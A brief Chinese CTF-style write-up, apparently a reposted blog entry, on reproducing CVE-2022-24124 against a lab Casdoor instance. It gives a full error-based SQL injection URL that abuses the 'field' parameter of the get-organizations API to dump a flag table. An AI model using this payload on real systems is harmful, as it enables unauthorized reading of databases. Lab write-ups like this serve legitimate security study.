当前位置:   article > 正文

CVE-2022-24124复现_cve-2022-24124复现 msfconsole

cve-2022-24124复现 msfconsole

难的一批,用updatexml注入没注出来(求大佬告诉updatexml怎么爆出来)

无数个小时尝试出的payload

http://eci-2ze625l338u3rfrh3r36.cloudeci1.ichunqiu.com:8000/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=(select 1 from (select count(*), concat((select concat(',',id,flag) from casdoor.flag limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/在线问答5/article/detail/917442
推荐阅读
相关标签
  

闽ICP备14008679号